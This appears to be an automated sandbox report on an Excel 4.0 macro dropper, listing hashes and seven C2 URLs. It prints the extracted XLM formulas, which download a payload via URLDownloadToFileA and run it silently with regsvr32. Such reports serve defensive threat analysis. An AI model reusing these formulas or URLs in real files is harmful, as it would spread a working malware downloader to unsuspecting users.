General

  • Target

    90b99dea71ca73b6b1ed59ed6640151255aa126504d1d88a7f32eed25ccbf9bb

  • Size

    38KB

  • Sample

    241120-wldmqs1ekr

  • MD5

    e37d003f9e9dfdf3b4bfc18a72851d7b

  • SHA1

    dd6e692e31a50c48d84c059914c10f6ef6a13c40

  • SHA256

    90b99dea71ca73b6b1ed59ed6640151255aa126504d1d88a7f32eed25ccbf9bb

  • SHA512

    137399d36d921fd1ee5916af6a63e67d50a99870676e219f98bcfc4af6b96858726b51770a070967d6cbc6d0ab3e67a30ba234e6ecd7063bd3489aa21a60ef7c

  • SSDEEP

    768:KmcXd/GCR8tijOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFs:KmqTeSOZZ1ZYpoQ/pMAeVIyTCR

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.berekethaber.com/dosyalar/4MZnNVw8Z/

https://damjangro.org/data/IlBcH2mM/

https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/

https://www.awam.be/wp-admin/ug9Zz/

https://protokol.mx/Archivos/SjKWNoeYre/

https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/

https://bengtverhoef.nl/stats/SJ1csD7/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\wnru.ocx",0,0)
    =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\wnru.ocx",0,0))
    =IF('HUNJK'!E27<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx")
    =RETURN()

Extracted

Language: xlm4.0

Source: xlm40.dropper

URLs:

    https://www.berekethaber.com/dosyalar/4MZnNVw8Z/
    https://damjangro.org/data/IlBcH2mM/
    https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/
    https://www.awam.be/wp-admin/ug9Zz/
    https://protokol.mx/Archivos/SjKWNoeYre/
    https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/
    https://bengtverhoef.nl/stats/SJ1csD7/

Targets

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
